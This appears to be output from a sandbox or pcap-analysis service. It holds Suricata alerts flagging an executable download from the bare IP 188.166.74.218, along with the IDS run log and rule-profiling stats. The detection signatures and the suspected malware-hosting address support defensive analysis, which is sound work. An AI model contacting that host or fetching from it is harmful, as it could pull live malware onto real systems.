  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          8011            2               2               4034            4005.00         4005.00         0.00           


suricata-4.0.0-etpro-all-alert-2019-05-01-T-14-35-42-05012019.1435-a02ab19f-2fe3-43b9-a4f2-6c4549ccee72.pcap.txt - (1100 bytes) - download
1
2
3
4
5
04/30/2019-02:29:52.179783  [**] [1:2016141:5] ET INFO Executable Download from dotted-quad Host [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.100.175:49192 -> 188.166.74.218:80
04/30/2019-02:29:52.179783  [**] [1:2019714:10] ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.100.175:49192 -> 188.166.74.218:80
04/30/2019-02:29:52.196943  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 188.166.74.218:80 -> 192.168.100.175:49192
04/30/2019-02:29:52.196943  [**] [1:2021076:2] ET INFO SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 188.166.74.218:80 -> 192.168.100.175:49192
04/30/2019-02:29:54.956067  [**] [1:2015744:4] ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) [**] [Classification: Misc activity] [Priority: 3] {TCP} 188.166.74.218:80 -> 192.168.100.175:49192


IDSDeathBlossom.py.log - (1176 bytes) - download
1
2
3
4
5
6
7
8
2019-05-01 14:35:18,302 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-05-01 14:35:19,036 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-05-01 14:35:19,036 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-05-01 14:35:19,037 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-05-01 14:35:19,037 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-05-01 14:35:19,037 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/62429eda87eaf55ba4e1b45d7bcd1db956b33745cb75ec8c950e11a498e082d2 -r /var/pcap/05012019.1435-a02ab19f-2fe3-43b9-a4f2-6c4549ccee72.pcap -vvv -k none
2019-05-01 14:35:42,264 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-05-01 14:35:42,264 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 23.9734280109